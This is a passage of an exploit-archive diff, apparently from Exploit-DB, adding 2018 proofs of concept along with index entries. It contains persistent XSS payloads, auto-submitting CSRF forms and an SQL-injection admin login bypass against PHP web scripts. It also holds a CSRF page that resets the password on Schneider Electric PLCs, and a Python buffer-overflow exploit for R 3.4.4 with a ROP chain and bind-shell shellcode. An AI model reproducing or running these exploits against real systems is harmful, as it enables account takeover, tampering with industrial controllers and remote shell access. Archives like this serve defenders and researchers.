 value="1"/><fieldset
 id="plgslt_Slot_Main_2_page_'"--></style></scRipt><scRipt>alert(EZK)</scRipt>"
 class="page_"><div class="form_fields"></div><div
 class="form_buttons"><input type="button" value=""
 class="next"/></div>
--- a/exploits/php/webapps/44679.txt
+++ b/exploits/php/webapps/44679.txt
@ -0,0 +1,52 @@
 # Exploit Title:  Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin panel Authentication bypass
 # Date: 2018-05-21
 # Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
 # Vendor Homepage: https://codecanyon.net/item/auto-dealership-vehicle-showroom-websys/17013273?s_rank=28
 # Version: 1.0
 # Tested on: Kali linux
 # Description: Auto Dealership & Vehicle Showroom WebSys 1.0 suffers from multiple vulnerabilities:
 # POC 1 : Persistent cross site scripting :
 1) After creating an account , go to your profile.
 2) Navigate to "Update profile" and put this payload :
 "/><script>alert(document.cookie)</script>
 3) You will have an alert box in the page .
 # POC 2 : CSRF :
 # Attacker can change user's authentication directly :
 # User's CSRF exploit :
 <html>
 <head>
    <title>CSRF POC</title>
 </head>
 <body>
    <form action="http://vehicle.thesoftking.com/updateprofile" method="post">
        <input type="hidden" name="name" value="anything">
        <input type="hidden" name="mobile" value="200000">
        <input type="hidden" name="address" value="anything">
    </form>
    <script>
        document.forms[0].submit();
    </script>
 </body>
 </html>
 # Admin page CSRF exploit :
 <form action="http://vehicle.thesoftking.com/admin/setgeneral.php" method="post">
        <input name="name" value="test" type="hidden">
        <input name="wcmsg" value="test" type="hidden">
        <input name="address" value="test2" type="hidden">
        <input name="mobile" value="2000000" type="hidden">
        <input name="email" value="test@test.com" type="hidden">
        <input name="currency" value="decode" type="hidden">
 </form>
    <script>
         document.forms[0].submit();
    </script>
 # POC 3 : Authentication bypass :
 Path : /admin
 Username : ' or 0=0 #
 Password : anything
--- a/exploits/php/webapps/44682.txt
+++ b/exploits/php/webapps/44682.txt
@ -0,0 +1,56 @@
 # Exploit Title: Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication bypass
 # Date: 2018-05-21
 # Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
 # Vendor Homepage: https://codecanyon.net/item/model-agency-media-house-model-gallery/16927610?s_rank=29
 # Version: 1.0
 # Tested on: Kali linux
 # Description:
 #Model Agency - Media House & Model Gallery  1.0 suffers from multiple vulnerabilities :
 # POC 1 : Persistent cross site scripting :
 1) After creating an account , go to your profile.
 2) Navigate to "Update profile" and put this payload :
 "/><script>alert(document.domain)</script>
 3) You will have an alert box in the page .
 # POC 2 : CSRF : cross site request forgery :
 # User's CSRF exploit :
 <html>
 <head>
    <title>CSRF POC</title>
 </head>
 <body>
    <form action="http://model.thesoftking.com/updateprofile"
 method="post">
        <input type="hidden" name="name" value="anything">
        <input type="hidden" name="mobile" value="200000">
        <input type="hidden" name="address" value="anything">
    </form>
    <script>
        document.forms[0].submit();
    </script>
 </body>
 </html>
 # Admin page CSRF exploit :
 <form action="http://model.thesoftking.com/admin/setgeneral.php"
 method="post">
        <input name="name" value="test" type="hidden">
        <input name="wcmsg" value="test" type="hidden">
        <input name="address" value="test2" type="hidden">
        <input name="mobile" value="1000000" type="hidden">
        <input name="email" value="test@test.com" type="hidden">
        <input name="currency" value="decode" type="hidden">
 </form>
    <script>
         document.forms[0].submit();
    </script>
 # POC 3 : Authentication bypass :
 # Attacker can bypass admin panel without any authentication :
 Path : /admin
 Username : ' or 0=0 #
 Password : anything
--- a/exploits/php/webapps/44683.txt
+++ b/exploits/php/webapps/44683.txt
@ -0,0 +1,12 @@
 # Exploit Title: Wchat - Fully Responsive PHP AJAX Chat Script  1.5 - Persistent cross site scripting
 # Date: 2018-05-21
 # Exploit Author: Borna nematzadeh (L0RD)
 # Vendor Homepage: https://codecanyon.net/item/wchat-fully-responsive-phpajax-chat/18047319?s_rank=1327
 # Version: 1.5
 # Tested on: Windows
 # POC :
 1) Create your account and navigate to "Edit profile"
 2) Put this payload into textarea :
 </textarea><script>console.log(document.cookie)</script>
 3) The payload will be executed if someone opens your profile .
--- a/exploits/windows/webapps/44678.txt
+++ b/exploits/windows/webapps/44678.txt
@ -0,0 +1,103 @@
 # Exploit Title: Schneider Electric PLCs - Cross-Site Request Forgery
 # Date: 2018-05-12
 # Exploit Author: t4rkd3vilz
 # Vendor Homepage: http://www.schneider-electric.com/
 # Tested on: Windows
 # CVE: CVE-2013-0663
 # Version: Schneider Electric Quantum PLC: 140NOE77111, 140NOE77101, 140NWM10000
 # Modicon M340 PLC: BMXNOC0401, BMXNOE0100x, BMXNOE011xx
 # Premium PLC: TSXETY4103, TSXETY5103, and TSXWMY100
 # Category: webapps
 <html>
 <head>
    <title>CSRF POC</title>
 </head>
 <body>
    <form method="get" action="http://TargetIP/secure/embedded/builtin" name="sample" onSubmit="return validateForm()">
 <table border="0" cellspacing="0" cellpadding="0" width="300" style="height: 100" bgcolor="#C0C0C0">
 <tr>
 <td class="inputCell" width="200">
 <div align="left">
 <h5>Name:</h5>
 <script language="javascript" type="text/javascript">
 <!--//
 paramLang();
 switch(getLanguage())
 {
 default:
 document.write("Username :"); break;
 }
 //-->
 </script>
 </div>
 </td>
 <td class="inputCell" width="190">
 <input type="text" name="user" size="20">
 </td>
 </tr>
 <tr>
 <td class="inputCell" width="200">
 <div align="left">&
 <h5>Pass:</h5>
 <script language="javascript" type="text/javascript">
 <!--//
 switch(getLanguage())
 {
 default:
 document.write("New password :"); break;
 }
 //-->
 </script>
 </div>
 </td>
 <td class="inputCell" width="190">
 <input type="password" name="passwd" size="20">
 </td>
 </tr>
 <tr>
 <td class="inputCell" width="200">
 <div align="left">
 <h5>Verify Pass:</h5>
 <script language="javascript" type="text/javascript">
 <!--//
 switch(getLanguage())
 {
 default:
 document.write("Confirm password :"); break;
 }
 //-->
 </script>
 </div>
 </td>
 <td class="inputCell" width="190">
 <input type="password" name="cnfpasswd" size="20">
 </td>
 </tr>
 </table>
 <br>
 <div align="center">
 <script language="javascript" type="text/javascript">
 <!--//
 switch(getLanguage())
 {
 default:
 document.write('<input type="submit" name="subhttppwd" value="Change Password">'); break;
 }
 //-->
 </script>
 <input type="submit" name="subhttppwd" value="Change Password">
 </div>
 </form>
 <br>
 </td>
 </tr>
 <tr>
 <td align="center">
 <br>
 </body>
 </html>
--- a/exploits/windows_x86/local/44680.py
+++ b/exploits/windows_x86/local/44680.py
@ -0,0 +1,132 @@
 # Exploit Title: R v3.4.4 - Local Buffer Overflow (DEP Bypass)
 # Exploit Author: Hashim Jawad
 # Exploit Date: 2018-05-21
 # Vendor Homepage: https://www.r-project.org/
 # Vulnerable Software: https://www.exploit-db.com/apps/a642a3de7b5c2602180e73f4c04b4fbd-R-3.4.4-win.exe
 # Tested on OS: Microsoft Windows 7 Enterprise - SP1 (x86)
 # Steps to reproduce: under GUI preferences, paste payload.txt contents into 'Language for menus and messages'
 # Credit to bzyo for finding the bug (44516)
 #!/usr/bin/python
 import struct
 #root@kali:~# msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -b "\x00\x0a\x0d\x0e" -f python -v shellcode
 #Payload size: 718 bytes
 shellcode =  ""
 shellcode += "\x89\xe0\xdb\xd2\xd9\x70\xf4\x5b\x53\x59\x49\x49"
 shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
 shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
 shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
 shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
 shellcode += "\x69\x6c\x59\x78\x6c\x42\x77\x70\x33\x30\x37\x70"
 shellcode += "\x31\x70\x6b\x39\x6a\x45\x65\x61\x39\x50\x72\x44"
 shellcode += "\x6e\x6b\x30\x50\x56\x50\x4e\x6b\x62\x72\x56\x6c"
 shellcode += "\x6c\x4b\x31\x42\x34\x54\x4c\x4b\x62\x52\x64\x68"
 shellcode += "\x56\x6f\x68\x37\x70\x4a\x61\x36\x55\x61\x79\x6f"
 shellcode += "\x6e\x4c\x75\x6c\x73\x51\x51\x6c\x67\x72\x46\x4c"
 shellcode += "\x57\x50\x4b\x71\x5a\x6f\x36\x6d\x76\x61\x6b\x77"
 shellcode += "\x7a\x42\x39\x62\x76\x32\x73\x67\x6e\x6b\x36\x32"
 shellcode += "\x72\x30\x4e\x6b\x73\x7a\x55\x6c\x4e\x6b\x62\x6c"
 shellcode += "\x42\x31\x72\x58\x38\x63\x51\x58\x35\x51\x6b\x61"
 shellcode += "\x52\x71\x4e\x6b\x72\x79\x31\x30\x57\x71\x78\x53"
 shellcode += "\x6c\x4b\x50\x49\x64\x58\x6b\x53\x77\x4a\x70\x49"
 shellcode += "\x6e\x6b\x37\x44\x4e\x6b\x67\x71\x4b\x66\x45\x61"
 shellcode += "\x69\x6f\x6c\x6c\x49\x51\x6a\x6f\x46\x6d\x57\x71"
 shellcode += "\x5a\x67\x56\x58\x39\x70\x42\x55\x4b\x46\x74\x43"
 shellcode += "\x53\x4d\x59\x68\x35\x6b\x73\x4d\x47\x54\x64\x35"
 shellcode += "\x5a\x44\x36\x38\x6c\x4b\x56\x38\x57\x54\x76\x61"
 shellcode += "\x38\x53\x43\x56\x4c\x4b\x64\x4c\x30\x4b\x6c\x4b"
 shellcode += "\x33\x68\x35\x4c\x57\x71\x59\x43\x6c\x4b\x36\x64"
 shellcode += "\x6c\x4b\x46\x61\x4e\x30\x6b\x39\x63\x74\x47\x54"
 shellcode += "\x55\x74\x31\x4b\x43\x6b\x50\x61\x71\x49\x52\x7a"
 shellcode += "\x62\x71\x6b\x4f\x6b\x50\x61\x4f\x51\x4f\x32\x7a"
 shellcode += "\x6c\x4b\x66\x72\x5a\x4b\x4c\x4d\x71\x4d\x50\x68"
 shellcode += "\x76\x53\x45\x62\x65\x50\x75\x50\x31\x78\x73\x47"
 shellcode += "\x71\x63\x74\x72\x31\x4f\x62\x74\x75\x38\x50\x4c"
 shellcode += "\x70\x77\x55\x76\x36\x67\x49\x6f\x6b\x65\x6d\x68"
 shellcode += "\x7a\x30\x73\x31\x55\x50\x65\x50\x36\x49\x78\x44"
 shellcode += "\x33\x64\x62\x70\x65\x38\x65\x79\x6d\x50\x30\x6b"
 shellcode += "\x43\x30\x39\x6f\x39\x45\x31\x7a\x56\x68\x70\x59"
 shellcode += "\x70\x50\x69\x72\x59\x6d\x37\x30\x70\x50\x71\x50"
 shellcode += "\x50\x50\x33\x58\x39\x7a\x46\x6f\x79\x4f\x6d\x30"
 shellcode += "\x59\x6f\x69\x45\x7a\x37\x75\x38\x65\x52\x43\x30"
 shellcode += "\x37\x61\x63\x6c\x4f\x79\x5a\x46\x31\x7a\x34\x50"
 shellcode += "\x30\x56\x31\x47\x45\x38\x39\x52\x79\x4b\x66\x57"
 shellcode += "\x42\x47\x59\x6f\x5a\x75\x50\x57\x51\x78\x6c\x77"
 shellcode += "\x48\x69\x54\x78\x69\x6f\x6b\x4f\x59\x45\x72\x77"
 shellcode += "\x75\x38\x33\x44\x7a\x4c\x75\x6b\x39\x71\x49\x6f"
 shellcode += "\x78\x55\x71\x47\x6c\x57\x75\x38\x70\x75\x70\x6e"
 shellcode += "\x42\x6d\x35\x31\x79\x6f\x38\x55\x72\x48\x70\x63"
 shellcode += "\x42\x4d\x71\x74\x37\x70\x4f\x79\x79\x73\x71\x47"
 shellcode += "\x70\x57\x71\x47\x74\x71\x78\x76\x53\x5a\x42\x32"
 shellcode += "\x62\x79\x52\x76\x6b\x52\x59\x6d\x35\x36\x79\x57"
 shellcode += "\x52\x64\x35\x74\x57\x4c\x37\x71\x43\x31\x4e\x6d"
 shellcode += "\x50\x44\x36\x44\x56\x70\x59\x56\x47\x70\x42\x64"
 shellcode += "\x46\x34\x70\x50\x36\x36\x50\x56\x50\x56\x71\x56"
 shellcode += "\x42\x76\x30\x4e\x73\x66\x76\x36\x66\x33\x76\x36"
 shellcode += "\x32\x48\x42\x59\x68\x4c\x55\x6f\x6d\x56\x49\x6f"
 shellcode += "\x6b\x65\x4b\x39\x59\x70\x72\x6e\x70\x56\x51\x56"
 shellcode += "\x4b\x4f\x34\x70\x51\x78\x34\x48\x4e\x67\x37\x6d"
 shellcode += "\x51\x70\x59\x6f\x38\x55\x6d\x6b\x6c\x30\x48\x35"
 shellcode += "\x69\x32\x72\x76\x62\x48\x4c\x66\x5a\x35\x4f\x4d"
 shellcode += "\x4d\x4d\x69\x6f\x4a\x75\x65\x6c\x67\x76\x73\x4c"
 shellcode += "\x47\x7a\x4f\x70\x59\x6b\x4b\x50\x70\x75\x57\x75"
 shellcode += "\x6f\x4b\x53\x77\x55\x43\x64\x32\x52\x4f\x51\x7a"
 shellcode += "\x53\x30\x46\x33\x4b\x4f\x4b\x65\x41\x41"
 '''
 Output generated by mona.py v2.0, rev 582 - Immunity Debugger
 --------------------------------------------
 Register setup for VirtualProtect() :
 --------------------------------------------
 EAX = NOP (0x90909090)
 ECX = lpOldProtect (ptr to W address)
 EDX = NewProtect (0x40)
 EBX = dwSize
 ESP = lPAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualProtect()
 EDI = ROP NOP (RETN)
 --------------------------------------------
 '''
 rop  = struct.pack('<L', 0x6cacc7e2)      # POP EAX # RETN                    [R.dll] 
 rop += struct.pack('<L', 0x643cb170)      # ptr to &VirtualProtect()          [IAT Riconv.dll]
 rop += struct.pack('<L', 0x6e7d5435)      # MOV EAX,DWORD PTR DS:[EAX] # RETN [utils.dll] 
 rop += struct.pack('<L', 0x6ca347fa)      # XCHG EAX,ESI # RETN               [R.dll] 
 rop += struct.pack('<L', 0x6cb7429a)      # POP EBP # RETN                    [R.dll] 
 rop += struct.pack('<L', 0x6ca2a9bd)      # & jmp esp                         [R.dll]
 rop += struct.pack('<L', 0x64c45db2)      # POP EAX # RETN                    [methods.dll] 
 rop += struct.pack('<L', 0xfffffaff)      # value to negate, will become 0x00000501
 rop += struct.pack('<L', 0x643c361a)      # NEG EAX # RETN                    [Riconv.dll] 
 rop += struct.pack('<L', 0x6ca33b8a)      # XCHG EAX,EBX # RETN               [R.dll] 
 rop += struct.pack('<L', 0x6cbef3e4)      # POP EAX # RETN                    [R.dll] 
 rop += struct.pack('<L', 0xffffffc0)      # Value to negate, will become 0x00000040
 rop += struct.pack('<L', 0x6ff3a39a)      # NEG EAX # RETN                    [grDevices.dll] 
 rop += struct.pack('<L', 0x6ca558be)      # XCHG EAX,EDX # RETN               [R.dll] 
 rop += struct.pack('<L', 0x6cbe90a8)      # POP ECX # RETN                    [R.dll] 
 rop += struct.pack('<L', 0x6ff863c1)      # &Writable location                [grDevices.dll]
 rop += struct.pack('<L', 0x6cbe097f)      # POP EDI # RETN                    [R.dll] 
 rop += struct.pack('<L', 0x6375fe5c)      # RETN (ROP NOP)                    [Rgraphapp.dll]
 rop += struct.pack('<L', 0x6c998f58)      # POP EAX # RETN                    [R.dll] 
 rop += struct.pack('<L', 0x90909090)      # nop
 rop += struct.pack('<L', 0x6fedfa6c)      # PUSHAD # RETN                     [grDevices.dll] 
 buffer  = '\x41' * 292                    # filler to EIP
 buffer += struct.pack('<L', 0x6fef93c6)   # POP ESI # RETN                    [grDevices.dll]
 buffer += '\x41' * 4                      # compensate for pop esi
 buffer += rop
 buffer += '\x90' * 50
 buffer += shellcode
 buffer += '\x90' * (5000-292-4-4-len(rop)-50-len(shellcode))
 try:
 	f=open('payload.txt','w')
 	print '[+] Creating %s bytes evil payload..' %len(buffer)
 	f.write(buffer)
 	f.close()
 	print '[+] File created!'
 except Exception as e:
 	print e
--- a/exploits/linux/webapps/44430.txt
+++ b/exploits/linux/webapps/44430.txt
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -9722,6 +9722,8 @@ id,file,description,date,author,type,platform,port
 44652,exploits/linux/local/44652.py,"DynoRoot DHCP - Client Command Injection",2018-05-18,"Kevin Kirsche",local,linux,
 44654,exploits/linux/local/44654.rb,"Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit)",2018-05-18,Metasploit,local,linux,
 44658,exploits/windows/local/44658.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH) (DEP Bypass)",2018-05-20,"Juan Prescotto",local,windows,
 44677,exploits/linux/local/44677.rb,"Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit)",2018-05-21,Metasploit,local,linux,
 44680,exploits/windows_x86/local/44680.py,"R 3.4.4 - Local Buffer Overflow (DEP Bypass)",2018-05-21,"Hashim Jawad",local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39248,7 +39250,7 @@ id,file,description,date,author,type,platform,port
 44424,exploits/php/webapps/44424.txt,"Yahei PHP Prober 0.4.7 - Cross-Site Scripting",2018-04-09,ManhNho,webapps,php,
 44425,exploits/php/webapps/44425.txt,"WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution",2018-04-09,"Graeme Robinson",webapps,php,80
 44429,exploits/json/webapps/44429.txt,"CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution",2018-04-09,"RedTeam Pentesting",webapps,json,
-44430,exploits/linux/webapps/44430.txt,"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection",2018-04-09,LiquidWorm,webapps,linux,
+44430,exploits/xml/webapps/44430.txt,"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection",2018-04-09,LiquidWorm,webapps,xml,
 44431,exploits/linux/webapps/44431.txt,"KYOCERA Net Admin 3.4 - Cross-Site Request Forgery (Add Admin)",2018-04-09,LiquidWorm,webapps,linux,
 44432,exploits/php/webapps/44432.txt,"Buddypress Xprofile Custom Fields Type 2.6.3  - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
 44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
@ -39344,5 +39346,20 @@ id,file,description,date,author,type,platform,port
 44650,exploits/hardware/webapps/44650.txt,"Cisco SA520W Security Appliance - Path Traversal",2018-05-18,"Nassim Asrir",webapps,hardware,
 44655,exploits/linux/webapps/44655.txt,"SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion",2018-05-18,"Richard Alviarez",webapps,linux,
 44657,exploits/hardware/webapps/44657.txt,"D-Link DSL-3782 - Authentication Bypass",2018-05-20,"Giulio Comi",webapps,hardware,
-44659,exploits/jsp/webapps/44659.py,"Adobe Enterprise Manager (AEM) < 6.3 - Remote Code Execution",2018-05-20,StaticFlow,webapps,jsp,
+44661,exploits/php/webapps/44661.txt,"Superfood 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php,
 44660,exploits/php/webapps/44660.txt,"Joomla! Component EkRishta 2.10 - Cross-Site Scripting / SQL Injection",2018-05-20,"Sina Kheirkhah",webapps,php,
 44662,exploits/php/webapps/44662.txt,"Private Message PHP Script 2.0 - Persistent Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
 44663,exploits/php/webapps/44663.txt,"Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2018-05-21,L0RD,webapps,php,
 44664,exploits/php/webapps/44664.txt,"Zenar Content Management System - Cross-Site Scripting",2018-05-21,"Berk Dusunur",webapps,php,
 44668,exploits/java/webapps/44668.py,"GitBucket 4.23.1 - Remote Code Execution",2018-05-21,"Kacper Szurek",webapps,java,
 44666,exploits/java/webapps/44666.txt,"ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting",2018-05-21,"Ahmet Gurel",webapps,java,
 44667,exploits/linux/webapps/44667.txt,"Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery",2018-05-21,t4rkd3vilz,webapps,linux,
 44671,exploits/hardware/webapps/44671.html,"Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
 44672,exploits/hardware/webapps/44672.txt,"Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
 44675,exploits/hardware/webapps/44675.html,"Teradek Cube 7.3.6 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
 44676,exploits/hardware/webapps/44676.html,"Teradek Slice 7.3.15 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
 44678,exploits/windows/webapps/44678.txt,"Schneider Electric PLCs - Cross-Site Request Forgery",2018-05-21,t4rkd3vilz,webapps,windows,
 44679,exploits/php/webapps/44679.txt,"Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass",2018-05-21,L0RD,webapps,php,
 44681,exploits/linux/webapps/44681.txt,"Merge PACS 7.0 - Cross-Site Request Forgery",2018-05-21,"Safak Aslan",webapps,linux,
 44682,exploits/php/webapps/44682.txt,"Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass",2018-05-21,L0RD,webapps,php,
 44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script  1.5 - Persistent Cross-Site Scripting",2018-05-21,L0RD,webapps,php,